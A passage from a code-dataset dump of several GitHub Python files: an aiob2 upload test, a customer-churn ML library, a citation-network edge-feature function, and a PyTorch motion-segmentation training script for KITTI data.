else:\n # 記事一覧\n return template.render('aws/index.html', \n contents_list=model.get_list())\n\n","repo_name":"k0b4314/cloud-workshop","sub_path":"web/app/views/aws.py","file_name":"aws.py","file_ext":"py","file_size_in_byte":608,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26327399915","text":"import os\nimport pytest\nimport uuid\nimport logging\nimport datetime\nfrom pathlib import Path\n\nfrom aiob2 import Client\nfrom .conftest import ValueStorage\n\npath = Path(__file__).resolve().parent / 'payloads/test_image.jpg'\nbucket_id = os.environ['BUCKET_ID']\n\n\nclass TestUpload:\n @pytest.mark.asyncio\n @pytest.mark.order(1)\n async def test_upload(self):\n client = Client(os.environ['KEY_ID'], os.environ['KEY'], log_level=logging.DEBUG)\n file_name = str(uuid.uuid4())\n\n file = await client.upload_file(\n file_name=file_name,\n content_bytes=path.read_bytes(),\n bucket_id=bucket_id,\n content_type='image/jpeg',\n content_disposition='inline; filename=\"foo.jpg\"',\n content_language=['en', 'ru'],\n expires=datetime.datetime.now() + datetime.timedelta(minutes=5),\n comments={'foo': 'bar'},\n server_side_encryption='AES256'\n )\n\n assert file.name == file_name\n assert file.bucket_id == bucket_id\n assert file.content_type == 'image/jpeg'\n assert file.server_side_encryption['algorithm'] == 'AES256' # type: ignore\n\n # some more tests relating to this will be performed in the download,\n # such as, the disposition, language, expires and comments.\n\n ValueStorage.test_upload_file = file\n\n await client.close()\n","repo_name":"Void-ux/aiob2","sub_path":"tests/test_upload.py","file_name":"test_upload.py","file_ext":"py","file_size_in_byte":1392,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"53"} +{"seq_id":"28137538510","text":"# library doc string\n'''\nAuthor: Leen\nVersion: 0.1\nDate: 12/12/2021\nThis module provides a set of functions that will predict customer churn, \nguaranteeing readability and modularization\n'''\n\n# import libraries\nfrom sklearn.metrics import plot_roc_curve, classification_report\nfrom sklearn.model_selection import GridSearchCV, train_test_split\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.preprocessing import normalize\nimport scikitplot as skplt\nimport pandas as pd\nimport numpy as np\nimport shap\nimport joblib\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nsns.set()\n\n\ndef import_data(pth):\n '''\n returns dataframe for the csv found at pth\n\n input:\n pth: a path to the csv\n output:\n df: pandas dataframe\n '''\n data = pd.DataFrame()\n try:\n assert isinstance(pth, str)\n data = pd.read_csv(pth)\n except AssertionError as msg:\n print(\"The given path is not a string\")\n print(msg)\n\n except FileNotFoundError as msg:\n print(\"The given path could not be found\")\n print(msg)\n return data\n\n\ndef perform_eda(df):\n '''\n perform eda on df and save figures to images folder\n input:\n df: pandas dataframe\n\n output:\n None\n '''\n try:\n assert isinstance(df, pd.DataFrame)\n \n plt.figure(figsize=(20, 10))\n df['Churn'].hist()\n plt.savefig('images/eda/churn.png')\n\n plt.figure(figsize=(20, 10))\n df['Customer_Age'].hist()\n plt.savefig('images/eda/customer_age.png')\n\n plt.figure(figsize=(20, 10))\n df.Marital_Status.value_counts('normalize').plot(kind='bar')\n plt.savefig('images/eda/marital_status.png')\n\n plt.figure(figsize=(20, 10))\n sns.distplot(df['Total_Trans_Ct'])\n plt.savefig('images/eda/total_trans_ct.png')\n\n plt.figure(figsize=(20, 10))\n sns.heatmap(df.corr(), annot=False, cmap='Dark2_r', linewidths=2)\n plt.savefig('images/eda/heat_map.png')\n\n except AssertionError as msg:\n print(\"The given path is not a string\")\n print(msg)\n except:\n print(\"Exception in perform_eda\")\n\n\ndef encoder_helper(df, category_lst, response):\n '''\n helper function to turn each categorical column into a new column with\n propotion of churn for each category - associated with cell 15 from the notebook\n\n input:\n df: pandas dataframe\n category_lst: list of columns that contain\n categorical features\n response: string of response name [optional argument \n that could be used for naming variables or index y column]\n\n output:\n df: pandas dataframe with new columns for\n '''\n try:\n assert isinstance(category_lst, list)\n assert isinstance(response, list)\n assert isinstance(df, pd.Dataframe)\n i = 0\n for cat in category_lst:\n # encoded column\n cat_lst = []\n cat_groups = df.groupby(cat).mean()['Churn']\n\n for val in df[cat]:\n cat_lst.append(cat_groups.loc[val])\n\n df[response[i]] = cat_lst\n i = i + 1\n return df\n\n except AssertionError as msg:\n print('the parameters are incorrect types')\n print(msg)\n\n except BaseException:\n print('exception in encoder helper!')\n\n\ndef perform_feature_engineering(df, response):\n '''\n input:\n df: pandas dataframe\n response: string of response name [optional argument that could be used for naming variables or index y column]\n\n output:\n X_train: X training data\n X_test: X testing data\n y_train: y training data\n y_test: y testing data\n '''\n try:\n assert isinstance(df, pd.DataFrame)\n assert isinstance(response, str)\n y = df[response]\n X = df.drop(columns=response)\n\n X_train, X_test, y_train, y_test = train_test_split(\n X, y, test_size=0.3, random_state=42)\n\n return X_train, X_test, y_train, y_test\n\n except AssertionError as msg:\n print('parameter types are incorrect')\n print(msg)\n except BaseException as msg:\n print('Exception in perform_feature_engineering')\n print(msg)\n\n\ndef classification_report_image(y_train,\n y_test,\n y_train_preds_lr,\n y_train_preds_rf,\n y_test_preds_lr,\n y_test_preds_rf):\n '''\n produces classification report for training and testing results and stores report as image\n in images folder\n input:\n y_train: training response values\n y_test: test response values\n y_train_preds_lr: training predictions from logistic regression\n y_train_preds_rf: training predictions from random forest\n y_test_preds_lr: test predictions from logistic regression\n y_test_preds_rf: test predictions from random forest\n\n output:\n None\n '''\n \n try:\n assert isinstance(y_train, list)\n assert isinstance(y_test, list)\n assert isinstance(y_train_preds_lr, list)\n assert isinstance(y_train_preds_rf, list)\n assert isinstance(y_test_preds_lr, list)\n assert isinstance(y_test_preds_rf, list)\n\n plt.rc('figure', figsize=(5, 5))\n plt.text(0.01, 1.25, str('Random Forest Train'), {\n 'fontsize': 10}, fontproperties='monospace')\n plt.text(0.01, 0.05, str(classification_report(y_test, y_test_preds_rf)), {\n 'fontsize': 10}, fontproperties='monospace') # approach improved by OP -> monospace!\n plt.text(0.01, 0.6, str('Random Forest Test'), {\n 'fontsize': 10}, fontproperties='monospace')\n plt.text(0.01, 0.7, str(classification_report(y_train, y_train_preds_rf)), {\n 'fontsize': 10}, fontproperties='monospace') # approach improved by OP -> monospace!\n plt.axis('off')\n plt.savefig('images/results/random_forest_report.png')\n\n plt.rc('figure', figsize=(5, 5))\n plt.text(0.01, 1.25, str('Logistic Regression Train'),\n {'fontsize': 10}, fontproperties='monospace')\n plt.text(0.01, 0.05, str(classification_report(y_train, y_train_preds_lr)), {\n 'fontsize': 10}, fontproperties='monospace') # approach improved by OP -> monospace!\n plt.text(0.01, 0.6, str('Logistic Regression Test'), {\n 'fontsize': 10}, fontproperties='monospace')\n\n plt.text(0.01, 0.7, str(classification_report(y_test, y_test_preds_lr)), {\n 'fontsize': 10}, fontproperties='monospace') # approach improved by OP -> monospace!\n plt.axis('off')\n plt.savefig('images/results/logistic_regression_report.png')\n \n except AssertionError as msg:\n print('one of the parameters is not a list')\n print(msg)\n\ndef feature_importance_plot(model, X_data, output_pth):\n '''\n creates and stores the feature importances in pth\n input:\n model: model object containing feature_importances_\n X_data: pandas dataframe of X values\n output_pth: path to store the figure\n\n output:\n None\n '''\n try:\n assert isinstance(X_data, pd.DataFrame)\n assert isinstance(output_pth, str)\n #unsure how to check for model instance without specifiying if its logistic regression\n #or Random Forest\n \n # Calculate feature importances\n importances = model.best_estimator_.feature_importances_\n # Sort feature importances in descending order\n indices = np.argsort(importances)[::-1]\n\n # Rearrange feature names so they match the sorted feature importances\n names = [X_data.columns[i] for i in indices]\n\n # Create plot\n plt.figure(figsize=(20, 5))\n\n # Create plot title\n plt.title(\"Feature Importance\")\n plt.ylabel('Importance')\n\n # Add bars\n plt.bar(range(X_data.shape[1]), importances[indices])\n\n # Add feature names as x-axis labels\n plt.xticks(range(X_data.shape[1]), names, rotation=90)\n\n plt.savefig(output_pth + '/feature_importance.png')\n \n except AssertionError as msg:\n print('the parameters are incorrect types')\n print(msg)\n\ndef train_models(X_train, X_test, y_train, y_test):\n '''\n train, store model results: images + scores, and store models\n input:\n X_train: X training data\n X_test: X testing data\n y_train: y training data\n y_test: y testing data\n output:\n None\n '''\n \n try:\n assert isinstance(y_train, list)\n assert isinstance(y_test, list)\n assert isinstance(X_train, pd.Dataframe)\n assert isinstance(X_test, pd.DataFrame)\n \n # grid search\n rfc = RandomForestClassifier(random_state=42)\n lrc = LogisticRegression()\n param_grid = {\n 'n_estimators': [200, 500],\n 'max_features': ['auto', 'sqrt'],\n 'max_depth': [4, 5, 100],\n 'criterion': ['gini', 'entropy']\n }\n cv_rfc = GridSearchCV(estimator=rfc, param_grid=param_grid, cv=5)\n cv_rfc.fit(X_train, y_train)\n lrc.fit(X_train, y_train)\n y_train_preds_rf = cv_rfc.best_estimator_.predict(X_train)\n y_test_preds_rf = cv_rfc.best_estimator_.predict(X_test)\n y_train_preds_lr = lrc.predict(X_train)\n y_test_preds_lr = lrc.predict(X_test)\n\n lrc_plot = plot_roc_curve(lrc, X_test, y_test)\n # Not sure if this will work\n lrc_plot.savefig('images/results/lr_roc_curve.png')\n skplt.metrics.plot_roc_curve(lrc, X_test, y_test)\n plt.savefig('images/results/lr_roc_auc.png')\n\n # plots\n plt.figure(figsize=(15, 8))\n ax = plt.gca()\n rfc_disp = plot_roc_curve(\n cv_rfc.best_estimator_,\n X_test,\n y_test,\n ax=ax,\n alpha=0.8)\n lrc_plot.plot(ax=ax, alpha=0.8)\n plt.savefig('images/results/comparative_roc_auc.png')\n\n # save best model\n joblib.dump(cv_rfc.best_estimator_, './models/rfc_model.pkl')\n joblib.dump(lrc, './models/logistic_model.pkl')\n \n except AssertionError as msg:\n print('Incorrect parameters: make sure X values are dataframes and Y values are a list')\n print(msg)\n except:\n print('Exception in Training function')","repo_name":"leenaltwayan/Predicting_Customer_Churn","sub_path":".ipynb_checkpoints/churn_library-checkpoint.py","file_name":"churn_library-checkpoint.py","file_ext":"py","file_size_in_byte":10711,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24740068470","text":"import numpy as np\nimport pandas as pd\n\nfrom pipeline_helper_functions import *\nfrom bag_of_words import *\n\n# list of possible vertex metrics\nvertex_metrics = ['indegree', 'outdegree', 'degree', 'd_pagerank',\n 'u_pagerank', 'd_closeness', 'u_closeness',\n 'd_betweenness', 'u_betweenness', 'authorities',\n 'hubs', 'd_eigen', 'u_eigen']\n\nvertex_metrics += ['recentcite_' + str(t) for t in np.arange(100+1)]\n\n\ndef get_edge_data(G, edgelist, snapshot_df, columns_to_use,\n tfidf_matrix=None, op_id_to_bow_id=None,\n metric_normalization=None, edge_status=None):\n \"\"\"\n Returns a data frame for all edges from given edge list\n for a given snapshot\n\n Parameters\n ----------\n G: graph (igraph object)\n\n edgelist: igraph indices of edges whose data to get\n\n snapshot_df: dictionary containing the snapshot information\n\n columns_to_use: list of columns to use\n\n tfidf_matrix: precomputed tfidf_matrix\n op_id_to_bow_id: dict that maps CL ids to indices of tdidf matrix\n\n edge_status: are the edges all present or absent or do we need to find out\n\n metric_normalization: normalize the snapshot metrics\n \"\"\"\n\n # make sure columns_to_use is a list\n if type(columns_to_use) == str:\n columns_to_use = [columns_to_use]\n\n num_edges = len(edgelist)\n\n # CL ids of ed cases (indexes the snap_df rows)\n ed_op_ids = [G.vs[edge[1]]['name'] for edge in edgelist]\n ing_op_ids = [G.vs[edge[0]]['name'] for edge in edgelist]\n\n # case dates\n ed_year = np.array([G.vs[edge[1]]['year'] for edge in edgelist])\n ing_year = np.array([G.vs[edge[0]]['year'] for edge in edgelist])\n\n # ed metrics in ing year ordered by ed_op_ids\n # note snapshot_df indices are ints\n ed_metrics = snapshot_df.loc[[int(i) for i in ed_op_ids]]\n\n # initialize edge data frame\n edge_data = pd.DataFrame(index=zip(ing_op_ids, ed_op_ids))\n edge_data.index.name = 'op_id' # op_id\n\n # add columns to edge data frame\n for metric in columns_to_use:\n\n # which vertex metrics from the snapshot df to grab\n # i.e. only grab vertex metric columns\n vertex_metrics_to_use = set(ed_metrics.columns).difference('year')\n\n if metric in vertex_metrics_to_use:\n edge_data[metric] = ed_metrics[metric].tolist()\n elif metric == 'age':\n edge_data[metric] = ing_year - ed_year\n elif metric == 'ing_year':\n edge_data[metric] = ing_year\n elif metric == 'ed_year':\n edge_data[metric] = ed_year\n elif metric == 'similarity':\n edge_data[metric] = compute_similarities(ing_op_ids, ed_op_ids,\n tfidf_matrix,\n op_id_to_bow_id)\n\n # possibly normalize metrics\n if metric_normalization:\n\n # only normalize graph vertex metrics i.e. not age\n metrics_to_normalize = set(columns_to_use).intersection(set(vertex_metrics))\n\n # normalize metics that deserve it\n for metric in metrics_to_normalize:\n values = edge_data[metric]\n scaling = get_scaling(values, metric_normalization, alpha=.05)\n edge_data[metric] = values / scaling\n\n # add edge status\n if edge_status is not None:\n if edge_status == 'present':\n is_edge = [1] * num_edges\n elif edge_status == 'absent':\n is_edge = [0] * num_edges\n elif edge_status == 'find':\n # look up edge status\n is_edge = [int(edge_is_present(G, e[0], e[1])) for e in edgelist]\n\n edge_data['is_edge'] = is_edge\n\n return edge_data\n\n\ndef get_scaling(values, scaling, alpha=.05):\n \"\"\"\n Returns scaling\n \"\"\"\n if scaling == 'mean':\n return np.mean(values)\n\n # robust mean\n elif scaling == 'upper trimmed mean':\n upper_bound = np.percentile(values, 1 - alpha)\n values_trimmed = values[values <= upper_bound]\n return np.mean(values_trimmed)\n elif scaling == 'lower trimmed mean':\n lower_bound = np.percentile(values, alpha)\n values_trimmed = values[values >= lower_bound]\n return np.mean(values_trimmed)\n elif scaling == 'trimmed mean':\n upper_bound = np.percentile(values, 1 - alpha)\n lower_bound = np.percentile(values, alpha)\n\n values_trimmed = values[(values >= lower_bound) & (values <= upper_bound)]\n return np.mean(values_trimmed)\n\n elif scaling == 'median':\n return np.median(values)\n elif scaling == 'max':\n return np.max(values)\n\n elif scaling == 'percentile':\n return np.percentile(values, alpha)\n\n else:\n raise ValueError('%s not implemented' % scaling)\n","repo_name":"idc9/law-net","sub_path":"vertex_metrics_experiment/code/get_edge_data.py","file_name":"get_edge_data.py","file_ext":"py","file_size_in_byte":4783,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"53"} +{"seq_id":"36595519854","text":"import time\nfrom tqdm import tqdm\nimport os\nimport random\nimport argparse\nimport numpy as np\nfrom torch.utils.data import DataLoader\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom PIL import Image\n\nfrom utils.visualizer import Visualizer\nfrom utils.loss import seg_loss, motion_loss\nfrom utils import scheduler, stream_metrics\n\nfrom dataset.seg_dataset import KITTIDataset\nfrom dataset.utils.warper import inverse_warp2\nfrom monodepth2 import layers\nfrom models.RMS import RMS\n\n\ndef get_argparser():\n parser = argparse.ArgumentParser()\n\n # Datset Options\n parser.add_argument(\"--train_file\", type=str, default='/home/zhanl/data/code/motion_seg/data/train.txt')\n parser.add_argument(\"--val_file\", type=str, default='/home/zhanl/data/code/motion_seg/data/val.txt')\n parser.add_argument(\"--dataset\", type=str, default='kitti',\n choices=['voc', 'cityscapes', 'kitti'], help='Name of dataset')\n parser.add_argument(\"--num_classes\", type=int, default=9, # FIXME 一共7个class,加上背景是8个\n help=\"num classes (default: None)\")\n parser.add_argument(\"--resize_factor\", type=tuple, default=(128, 416), help='the size of input images')\n\n # Deeplabv3+ Options\n parser.add_argument(\"--model\", type=str, default='RMS', help='model name')\n parser.add_argument(\"--separable_conv\", action='store_true', default=False,\n help=\"apply separable conv to decoder and aspp\") # a simple tool ``network.convert_to_separable_conv`` to convert ``nn.Conv2d`` to ``AtrousSeparableConvolution``\n #parser.add_argument(\"--pretrained_model\", type=str, default=, help='the path of pretrained mobilenetV2_ca')\n parser.add_argument(\"--downsample_factor\", type=int, default=8, choices=[8, 16]) # output_stride\n\n # Motion Options\n #parser.add_argument()\n #parser.add_argument()\n\n # Train Options\n parser.add_argument(\"--total_itrs\", type=int, default=30e3,\n help=\"epoch number (default: 30k)\") # 迭代次数设置多少好\n\n parser.add_argument(\"--test_only\", action='store_true', default=False, help='是否只验证不训练')\n parser.add_argument(\"--val_interval\", type=int, default=100, # TODO\n help=\"epoch interval for eval (default: 100)多少个epoch评估一次并保存最新权值,评估消耗时间多,频繁的评估会导致训练慢\")\n parser.add_argument(\"--save_val_results\", action='store_true', default=False,\n help=\"save segmentation results to \\\"./results\\\"\") # 是否要保存每次验证的结果\n parser.add_argument(\"--save_dir\", type=str, default='/home/zhanl/data/code/motion_seg/logs', help=\"权值和日志文件保存的文件夹\")\n\n parser.add_argument(\"--lr\", type=float, default=0.01,\n help=\"初始learning rate (default: 0.01)\")\n parser.add_argument(\"--lr_policy\", type=str, default='poly', choices=['poly', 'step'],\n help=\"learning rate scheduler policy\")\n parser.add_argument(\"--step_size\", type=int, default=10000) # 学习率多久下降一次\n parser.add_argument(\"--batch_size\", type=int, default=16,\n help='batch size (default: 16)')\n parser.add_argument(\"--val_batch_size\", type=int, default=16,\n help='batch size for validation (default: 4)')\n parser.add_argument(\"--crop_size\", type=int, default=128)\n parser.add_argument(\"--alpha\", type=float, default=10.0, help=\"超参:语义分割任务损失函数占比\")\n parser.add_argument(\"--beta\", type=float, default=1.0, help=\"超参:运动估计任务损失函数占比\")\n # TODO\n parser.add_argument(\"--cls_weight\", type=str, help=\"是否给不同种类赋予不同的损失权值,默认是平衡的。设置的话,注意设置成numpy形式的,长度和num_classes一样。\")\n\n parser.add_argument(\"--ckpt\", default=None, type=str,\n help=\"restore from checkpoint\") # 保存了要继续训练的本地模型\n parser.add_argument(\"--continue_training\", action='store_true', default=False)\n\n parser.add_argument(\"--loss_type\", type=str, default='cross_entropy',\n choices=['cross_entropy', 'focal_loss'], help=\"loss type\") # 由于类别少于10类,除了交叉熵损失还加上了dice loss,focal loss主要为了防止正负样本的不平衡\n\n parser.add_argument(\"--weight_decay\", type=float, default=1e-4,\n help='weight decay (default: 1e-4)')\n parser.add_argument(\"--random_seed\", type=int, default=1,\n help=\"random seed (default: 1)\")\n\n parser.add_argument(\"--gpu_id\", type=str, default='0, 1, 2, 3',\n help=\"GPU ID\")\n parser.add_argument(\"--num_workers\", type=int, default=4, help=\"多线程读取数据\")\n\n # Visdom options\n parser.add_argument(\"--enable_vis\", action='store_true', default=True,\n help=\"use visdom for visualization\")\n parser.add_argument(\"--vis_port\", type=str, default='13570',\n help='port for visdom')\n parser.add_argument(\"--vis_env\", type=str, default='main',\n help='env for visdom')\n parser.add_argument(\"--vis_num_samples\", type=int, default=8,\n help='number of samples for visualization (default: 8)')\n return parser\n\n\ndef get_dataset(opts):\n \"\"\" Dataset And Augmentation\n train_transform = et.ExtCompose([\n et.ExtRandomCrop(size=(opts.crop_size, opts.crop_size)),\n et.ExtColorJitter(brightness=0.5, contrast=0.5, saturation=0.5),\n et.ExtRandomHorizontalFlip(),\n et.ExtToTensor(),\n et.ExtNormalize(mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225]),\n ])\n\n val_transform = et.ExtCompose([\n # et.ExtResize( 512 ),\n et.ExtToTensor(),\n et.ExtNormalize(mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225]),\n ])\"\"\"\n if opts.dataset == 'kitti':\n #可能需要做一些图片增亮操作\n train_dst = KITTIDataset(file=opts.train_file, new_size=opts.resize_factor)\n val_dst = KITTIDataset(file=opts.val_file, new_size=opts.resize_factor)\n return train_dst, val_dst\n\n\ndef validate(opts, model, loader, device, metrics, ret_samples_ids=None):\n \"\"\"Do validation and return specified samples\"\"\"\n metrics.reset() # 重置对象的状态\n ret_samples = []\n if opts.save_val_results:\n if not os.path.exists('results'):\n os.mkdir('results')\n # 防止visdom显示图像可见度不高,需要进行反归一化,但是原kitti图像输入到网络中都没有进行normalize\n #denorm = utils.Denormalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])\n img_id = 0\n\n with torch.no_grad():\n\n for i, data in tqdm(enumerate(loader)):\n\n labels, Ir, It, Dr, Dt, pose, intrinsics_ = (data[s].to(device) for s in ['label', 'Ir', 'It', 'Dr', 'Dt', 'pose', 'intrinsics_mat'])\n warped_image, warped_depth = inverse_warp2(Ir, Dt, Dr, pose, intrinsics=intrinsics_,\n rotation_mode='euler',\n padding_mode='zeros') # TODO 投影的方式不确\n # residual warped image 和 residual warped depth\n residual_image = torch.abs(It - warped_image)\n residual_depth = torch.abs(Dt - warped_depth)\n\n Segr, Seg, res_trans = model(torch.cat((It, Ir), dim=1), # visual cues\n torch.cat((Dt, Dr, residual_depth, residual_image), dim=1)) # geometric cues\n # 分割结果seg没有经过归一化,这里输出的可能全是负数,经过np.uint8之后全部截断为0\n preds = F.softmax(Seg, dim=1).detach().max(dim=1)[1].cpu().numpy() # 返回的是每个通道最大值\n targets = labels.cpu().numpy()\n\n metrics.update(targets, preds)\n\n if ret_samples_ids is not None and i in ret_samples_ids: # get vis samples,选择一些结果可视化\n ret_samples.append(\n (It[0].detach().cpu().numpy(), targets[0], preds[0]))\n\n if opts.save_val_results:\n for i in range(len(It)):\n image = It[i].detach().cpu().numpy()\n target = targets[i]\n pred = preds[i]\n #image = (denorm(image) * 255).transpose(1, 2, 0).astype(np.uint8)\n image = It.transpose(1, 2, 0).astype(np.uint8)\n # decode_target是一个classmethod(相当于修改构造函数),目的是将seg mask转换成rgb图像,(N, H, W, 3), ranged 0~255, numpy array\n target = loader.dataset.decode_target(target).astype(np.uint8)\n pred = loader.dataset.decode_target(pred).astype(np.uint8)\n #本地存储图片\n Image.fromarray(image).save('results/%d_image.png' % img_id)\n Image.fromarray(target).save('results/%d_target.png' % img_id)\n Image.fromarray(pred).save('results/%d_pred.png' % img_id)\n img_id += 1\n score = metrics.get_results()\n return score, ret_samples\n\n\ndef main():\n opts = get_argparser().parse_args()\n\n # Setup visualization\n vis = Visualizer(port=opts.vis_port,\n env=opts.vis_env) if opts.enable_vis else None\n if vis is not None: # display options\n vis.vis_table(\"Options\", vars(opts))\n\n os.environ['CUDA_VISIBLE_DEVICES'] = opts.gpu_id # 0,1,2,3\n device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n print(\"Device: %s\" % device)\n\n # Setup random seed\n torch.manual_seed(opts.random_seed)\n np.random.seed(opts.random_seed)\n random.seed(opts.random_seed)\n\n # Setup dataloader\n train_dst, val_dst = get_dataset(opts)\n train_loader = DataLoader(\n train_dst, batch_size=opts.batch_size, shuffle=True, num_workers=opts.num_workers,\n drop_last=True) # drop_last=True to ignore single-image batches.\n val_loader = DataLoader(\n val_dst, batch_size=opts.val_batch_size, shuffle=True, num_workers=opts.num_workers)\n print(\"Dataset: %s, Train set: %d, Val set: %d\" %\n (opts.dataset, len(train_dst), len(val_dst)))\n\n # num_classes*2输出两张图片的分割结果\n model = RMS(image_size=opts.resize_factor, num_classes=opts.num_classes*2, downsample_factor=opts.downsample_factor)\n # 对decoder应用空洞卷积\n \"\"\"if opts.separable_conv and 'plus' in opts.model:\n network.convert_to_separable_conv(model.classifier)\"\"\"\n scheduler.set_bn_momentum(model.backbone, momentum=0.01)\n\n # Set up metrics\n metrics = stream_metrics.StreamSegMetrics(opts.num_classes)\n\n # Set up optimizer\n '''params=[\n {'params': model.backbone.parameters(), 'lr': 0.1 * opts.lr},\n {'params': model.classifier.parameters(), 'lr': opts.lr},\n {'params': model.seg_decoder.parameters(), 'lr': opts.lr},\n {'params': model.motion_decoder.parameters(), 'lr':opts.lr},]'''\n optimizer = torch.optim.SGD(model.parameters(), lr=opts.lr, momentum=0.9, weight_decay=opts.weight_decay)\n # optimizer = torch.optim.SGD(params=model.parameters(), lr=opts.lr, momentum=0.9, weight_decay=opts.weight_decay)\n # torch.optim.lr_scheduler.StepLR(optimizer, step_size=opts.lr_decay_step, gamma=opts.lr_decay_factor)\n if opts.lr_policy == 'poly':\n scheduler_ = scheduler.PolyLR(optimizer, opts.total_itrs, power=0.9)\n elif opts.lr_policy == 'step':\n scheduler_ = torch.optim.lr_scheduler.StepLR(optimizer, step_size=opts.step_size, gamma=0.1)\n\n # Set up criterion\n # criterion = utils.get_loss(opts.loss_type)\n if opts.loss_type == 'focal_loss':\n criterion1 = seg_loss.FocalLoss(ignore_index=255, size_average=True)\n elif opts.loss_type == 'cross_entropy':\n criterion1 = seg_loss.CELoss()\n criterion2 = motion_loss.MotionLoss()\n\n def save_ckpt(path):\n \"\"\" save current model\n \"\"\"\n torch.save({\n \"cur_itrs\": cur_itrs,\n \"model_state\": model.module.state_dict(),\n \"optimizer_state\": optimizer.state_dict(),\n \"scheduler_state\": scheduler_.state_dict(),\n \"best_score\": best_score,\n }, path)\n print(\"Model saved as %s\" % path)\n\n # Restore\n best_score = 0.0\n cur_itrs = 0\n cur_epochs = 0\n if opts.ckpt is not None and os.path.isfile(opts.ckpt):\n # https://github.com/VainF/DeepLabV3Plus-Pytorch/issues/8#issuecomment-605601402, @PytaichukBohdan\n checkpoint = torch.load(opts.ckpt, map_location=torch.device('cpu'))\n model.load_state_dict(checkpoint[\"model_state\"])\n model = nn.DataParallel(model)\n model.to(device)\n # 继续之前中断的训练\n if opts.continue_training:\n optimizer.load_state_dict(checkpoint[\"optimizer_state\"])\n scheduler_.load_state_dict(checkpoint[\"scheduler_state\"])\n cur_itrs = checkpoint[\"cur_itrs\"]\n best_score = checkpoint['best_score']\n print(\"Training state restored from %s\" % opts.ckpt)\n print(\"Model restored from %s\" % opts.ckpt)\n del checkpoint # free memory\n else:\n print(\"[!] Retrain\")\n model = nn.DataParallel(model)\n model.to(device)\n\n # ========== Train Loop ==========#\n vis_sample_id = np.random.randint(0, len(val_loader), opts.vis_num_samples,\n np.int32) if opts.enable_vis else None # sample idxs for visualization\n #denorm = utils.Denormalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]) # denormalization for ori images\n\n if opts.test_only:\n model.eval()\n val_score, ret_samples = validate(\n opts=opts, model=model, loader=val_loader, device=device, metrics=metrics, ret_samples_ids=vis_sample_id)\n print(metrics.to_str(val_score))\n return\n\n interval_loss = 0\n while True: # cur_itrs < opts.total_itrs:\n # ===== Train =====\n model.train()\n cur_epochs += 1\n for data in train_loader:\n cur_itrs += 1\n\n labels, Ir, It, Dr, Dt, pose, intrinsics_ = (data[s].to(device) for s in ['label', 'Ir', 'It', 'Dr', 'Dt', 'pose', 'intrinsics_mat'])\n warped_image, warped_depth = inverse_warp2(Ir, Dt, Dr, pose, intrinsics=intrinsics_,\n rotation_mode='euler', padding_mode='zeros') # TODO 投影的方式不确\n # residual warped image 和 residual warped depth\n residual_image = torch.abs(It-warped_image)\n residual_depth = torch.abs(Dt-warped_depth)\n optimizer.zero_grad()\n # 前半部分是参考帧即t-1帧的分割结果, 后半部分是目标帧即t帧的分割结果\n Segr, Segt, res_trans = model(torch.cat((Ir, It), dim=1), # visual cues\n torch.cat((Dr, Dt, residual_depth, residual_image), dim=1)) # geometric cue\n\n # appearance→occlusion mask,这里使用的entropycross损失函数内部会进行一次softmax,所以不需要再归一化了\n loss1 = criterion1(Segt, labels) # TODO 可以加上warped seg和原seg的差值(可以加上occlusion mask):这里得到的mask可以再判断其准确度是否能用在motion_loss里面\n\n #这里的两个mask也是没有经过softmax归一化的 TODO\n loss2 = criterion2(Ir, It, Dr, Dt, pose, intrinsics_, res_trans, torch.argmax(Segt, dim=1, keepdim=True),\n torch.argmax(Segr, dim=1, keepdim=True), loss1)\n\n loss = opts.alpha * loss1 + opts.beta * loss2 # TODO 损失占比还不确定\n loss.backward()\n optimizer.step()\n\n np_loss, np_loss1, np_loss2 = loss.detach().cpu().numpy(), loss1.detach().cpu().numpy(), loss2.detach().cpu().numpy()\n interval_loss += np_loss\n if vis is not None:\n vis.vis_scalar('SegLoss', cur_itrs, np_loss1) # 分开展示\n vis.vis_scalar('MotionLoss', cur_itrs, np_loss2)\n\n if (cur_itrs) % 10 == 0:\n interval_loss = interval_loss / 10\n print(\"Epoch %d, Itrs %d/%d, Loss=%f\" %\n (cur_epochs, cur_itrs, opts.total_itrs, interval_loss))\n interval_loss = 0.0\n\n # validation 这里每训练160个数据就要测试2574个数据???\n if (cur_itrs) % opts.val_interval == 0:\n save_ckpt('logs/latest_%s_%s_os%d.pth' %\n (opts.model, opts.dataset, opts.downsample_factor))\n print(\"validation...\")\n model.eval()\n val_score, ret_samples = validate( # dict:5 和\n opts=opts, model=model, loader=val_loader, device=device, metrics=metrics,\n ret_samples_ids=vis_sample_id)\n\n print(metrics.to_str(val_score))\n\n if val_score['Mean IoU'] > best_score: # save best model\n best_score = val_score['Mean IoU']\n save_ckpt('logs/best_%s_%s_os%d.pth' %\n (opts.model, opts.dataset, opts.downsample_factor))\n\n if vis is not None: # visualize validation score and samples\n vis.vis_scalar(\"[Val] Overall Acc\", cur_itrs, val_score['Overall Acc'])\n vis.vis_scalar(\"[Val] Mean IoU\", cur_itrs, val_score['Mean IoU'])\n vis.vis_table(\"[Val] Class IoU\", val_score['Class IoU'])\n\n for k, (img, target, lbl) in enumerate(ret_samples):\n img = (img*255).astype(np.uint8) # [3, 128, 416]\n target = train_dst.decode_target(target).transpose(2, 0, 1).astype(np.uint8) # [3, 128, 416]\n lbl = train_dst.decode_target(lbl).transpose(2, 0, 1).astype(np.uint8) # [3, 128, 416]:最后输出的全变成了0\n #moving_prediction = # TODO\n concat_img = np.concatenate((img, target, lbl), axis=1) # [3, 384, 416]\n vis.vis_image('Sample %d' % k, concat_img)\n model.train()\n scheduler_.step()\n\n if cur_itrs >= opts.total_itrs:\n return\n\n\nif __name__ == '__main__':\n torch.multiprocessing.set_start_method(method='forkserver', force=True)#'spawn')\n 